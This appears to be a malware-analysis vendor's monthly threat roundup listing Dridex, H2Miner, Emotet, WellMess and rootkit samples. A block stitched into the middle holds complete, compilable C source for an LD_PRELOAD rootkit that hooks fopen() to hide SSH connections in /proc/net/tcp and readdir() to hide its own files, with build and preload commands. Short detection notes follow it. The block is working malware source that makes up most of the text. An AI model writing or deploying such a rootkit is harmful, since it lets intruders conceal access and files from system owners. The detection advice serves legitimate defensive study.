Below are some of the threats our community detected this month:
1. Fileless Dridex sample, originally with five detections in VirusTotal, contains a payload that unpacks itself as shellcode. Learn about Intezer Analyze’s NEW unpacking capabilities
2. H2Miner, with only two out of 59 detections in VirusTotal, targets vulnerable SaltStack instances using CVE-2020-11651 and CVE-2020-11652. Exploitation of SaltStack Vulnerabilities Signals Increase in Cloud Server Attacks
3. Another H2Miner sample, also with two detections in VirusTotal, exploits the same SaltStack vulnerabilities, CVE-2020-11651 and CVE-2020-11652.
4. Fully undetected Linux LD_PRELOAD userland rootkit, uploaded from the United States and Russia, hides SSH connections by hooking fopen() on /proc/net/tcp and conceals itself by hooking readdir().
5. Cross-platform WellMess Linux sample, written in Go, has four detections in VirusTotal.
6. Emotet sample, uploaded from Japan, has five out of 70 detections in VirusTotal. Automatic unpacking in Intezer Analyze reveals the payload shares code with an older Emotet variant. Search by hash fccc6f6e8b036fd9536649cfaef73b6e to analyze the older variant in Intezer Analyze. Try it Now
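To make the hooking technique in item 4 concrete, here is an added C model of an LD_PRELOAD userland rootkit. It is an illustration written for this page, not code from the sample or from Intezer. The filtering logic lives in plain functions so it can be run and checked stand-alone; the actual fopen() and readdir() interposers are only compiled into the shared object with -DROOTKIT_SO. The hidden port (22), the file-name marker "libhook", the helper names and the sample /proc/net/tcp rows are all assumptions made for the example.

```c
/* Added example: minimal model of an LD_PRELOAD userland rootkit that hides
 * TCP rows on one port from /proc/net/tcp readers and hides its own files
 * from directory listings.  Illustration only, not the sample's code.
 * Build the hooks as a preload library with:
 *   gcc -shared -fPIC -DROOTKIT_SO -o libhook.so hook.c -ldl
 *   LD_PRELOAD=./libhook.so netstat -tan   # rows on port 22 vanish
 * Without -DROOTKIT_SO the file builds as a normal program that runs the
 * filter over a constructed table. */
#ifndef _GNU_SOURCE
#define _GNU_SOURCE              /* for RTLD_NEXT */
#endif
#include <dirent.h>
#include <dlfcn.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HIDDEN_PORT   22          /* assumption: the SSH port being hidden */
#define HIDDEN_MARKER "libhook"   /* assumption: entries containing this are hidden */

/* Return 1 if a /proc/net/tcp or /proc/net/tcp6 row has hidden_port as its
 * local or remote port.  Rows look like "sl: LOCALHEX:PORT REMOTEHEX:PORT ...";
 * the header line and anything that does not parse are kept (return 0). */
int tcp_line_hidden(const char *line, unsigned hidden_port)
{
    char lip[33], rip[33];        /* up to 32 hex digits for an IPv6 address */
    unsigned lport, rport;
    if (sscanf(line, "%*d: %32[0-9A-Fa-f]:%4x %32[0-9A-Fa-f]:%4x",
               lip, &lport, rip, &rport) != 4)
        return 0;
    return lport == hidden_port || rport == hidden_port;
}

/* Copy `in` to `out`, dropping rows that tcp_line_hidden() flags.
 * Returns the number of rows dropped, or -1 if `out` is too small. */
int filter_tcp_table(const char *in, unsigned hidden_port, char *out, size_t outsz)
{
    int dropped = 0;
    size_t used = 0;
    if (outsz == 0) return -1;
    out[0] = '\0';
    while (*in) {
        const char *nl = strchr(in, '\n');
        size_t n = nl ? (size_t)(nl - in) + 1 : strlen(in);
        char line[512];           /* ports sit near the start, so truncation is harmless */
        size_t copy = n < sizeof line - 1 ? n : sizeof line - 1;
        memcpy(line, in, copy);
        line[copy] = '\0';
        if (tcp_line_hidden(line, hidden_port)) {
            dropped++;
        } else {
            if (used + n + 1 > outsz) return -1;
            memcpy(out + used, in, n);
            used += n;
            out[used] = '\0';
        }
        in += n;
    }
    return dropped;
}

/* Directory entries the rootkit hides from ls, find and friends. */
int should_hide_name(const char *name)
{
    return strstr(name, HIDDEN_MARKER) != NULL;
}

/* Constructed sample of /proc/net/tcp: an sshd listener on :22 (0x0016), a
 * CUPS listener on :631 (0x0277) and an established SSH session on :22. */
const char SAMPLE_TCP_TABLE[] =
    "  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode\n"
    "   0: 00000000:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20345 1 0000000000000000 100 0 0 10 0\n"
    "   1: 0100007F:0277 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 20999 1 0000000000000000 100 0 0 10 0\n"
    "   2: 0A00020F:0016 0A000201:D3A4 01 00000000:00000000 02:00012345 00000000     0        0 21201 1 0000000000000000 20 4 30 10 -1\n";

#ifdef ROOTKIT_SO
/* Hooked fopen(): for the kernel connection tables, hand back a tmpfile
 * holding the filtered contents, so libc-based readers never see the rows. */
FILE *fopen(const char *path, const char *mode)
{
    FILE *(*real_fopen)(const char *, const char *) = dlsym(RTLD_NEXT, "fopen");
    FILE *real = real_fopen(path, mode);
    if (!real || (strcmp(path, "/proc/net/tcp") && strcmp(path, "/proc/net/tcp6")))
        return real;
    char *raw = NULL, chunk[512];
    size_t len = 0;
    while (fgets(chunk, sizeof chunk, real)) {   /* slurp the real table */
        size_t n = strlen(chunk);
        char *grown = realloc(raw, len + n + 1);
        if (!grown) break;
        raw = grown;
        memcpy(raw + len, chunk, n + 1);
        len += n;
    }
    fclose(real);
    char *clean = malloc(len + 1);
    FILE *fake = tmpfile();                       /* uses open()/fdopen(), no recursion */
    if (raw && clean && fake && filter_tcp_table(raw, HIDDEN_PORT, clean, len + 1) >= 0)
        fwrite(clean, 1, strlen(clean), fake);
    free(raw);
    free(clean);
    if (fake) rewind(fake);
    return fake;
}

/* Hooked readdir(): silently skip entries whose name carries the marker. */
struct dirent *readdir(DIR *dirp)
{
    struct dirent *(*real_readdir)(DIR *) = dlsym(RTLD_NEXT, "readdir");
    struct dirent *e;
    while ((e = real_readdir(dirp)) != NULL && should_hide_name(e->d_name))
        ;
    return e;
}
#else
int main(void)
{
    char out[sizeof SAMPLE_TCP_TABLE];
    int dropped = filter_tcp_table(SAMPLE_TCP_TABLE, HIDDEN_PORT, out, sizeof out);
    printf("dropped %d row(s); what a hooked netstat would see:\n%s", dropped, out);
    return 0;
}
#endif
```

Two practitioner notes follow from the model. First, the hooks only catch callers that go through libc: a statically linked tool, a raw read()/getdents64() syscall, or ss querying the kernel over netlink still sees the real rows, so diffing that view against netstat or ls output is a direct way to expose this class of rootkit, alongside checking /etc/ld.so.preload and the LD_PRELOAD environment of running processes. Second, a real sample has to interpose more than these two symbols (fopen64 and readdir64 on large-file-aware builds, plus open/stat variants) to stay hidden, which is exactly the widening set of hooked imports that makes such libraries stand out during analysis.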
Join the thousands of security professionals using the Intezer Analyze community edition to investigate suspicious files and devices. Sign up for free at analyze.intezer.com.
Check out the new features on our YouTube channel:
• NEW Malware Family View
• NEW Unpack Evasive Payloads in Memory
• NEW Search by String